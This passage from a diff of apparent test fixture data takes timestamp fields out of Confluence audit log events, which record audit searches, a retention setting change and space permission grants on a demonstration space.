performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"60 - 60\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:58.959089Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"1\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:38:57.393Z - 2021-11-23T00:38:57.393Z\"}]}", "type": "info", "kind": "event" @@ -10957,7 +10838,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837570545Z", "original": "{\"timestamp\":\"2021-11-23T00:38:57.393Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"49 - 59\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:57.380777Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"11\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.294Z - 2021-11-23T00:38:42.240Z\"}]}", "type": "info", "kind": "event" @@ -11041,7 +10921,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837571509Z", "original": "{\"timestamp\":\"2021-11-23T00:38:42.240Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"49 - 58\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:42.224135Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:35:04.294Z - 2021-11-23T00:38:35.211Z\"}]}", "type": "info", "kind": "event" @@ -11125,7 +11004,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837572419Z", "original": "{\"timestamp\":\"2021-11-23T00:38:35.211Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 57\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"From : 1970-01-01T00:00:00Z;To : 2021-11-23T00:38:35.065543Z;\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"57\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:35:04.387Z\"}]}", "type": "info", "kind": "event" @@ -11172,7 +11050,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.config.updated", - "ingested": "2021-12-24T00:46:29.837573682Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.387Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.config.updated\",\"action\":\"Audit Log configuration updated\"},\"affectedObjects\":[],\"changedValues\":[{\"key\":\"Retention\",\"i18nKey\":\"atlassian.audit.event.change.retention\",\"to\":\"3 Years\"}],\"system\":\"http://confluence.internal:8090\",\"method\":\"System\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11267,7 +11144,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837574544Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.306Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11363,7 +11239,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837575415Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.305Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11452,7 +11327,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837576345Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.303Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11548,7 +11422,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837577272Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.301Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11644,7 +11517,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837578153Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.299Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11733,7 +11605,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837579031Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.298Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11829,7 +11700,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837579907Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.296Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -11925,7 +11795,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837580848Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.294Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12014,7 +11883,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837581766Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.292Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12110,7 +11978,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837582823Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.290Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12206,7 +12073,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837583767Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.288Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12295,7 +12161,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837584647Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.287Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12391,7 +12256,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837585521Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.285Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12487,7 +12351,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837586397Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.283Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12576,7 +12439,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837587322Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.281Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12672,7 +12534,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837588727Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.279Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12768,7 +12629,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837589711Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.277Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12857,7 +12717,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837590588Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.275Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -12953,7 +12812,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837591452Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.273Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13049,7 +12907,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837592325Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.271Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -13138,7 +12995,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": 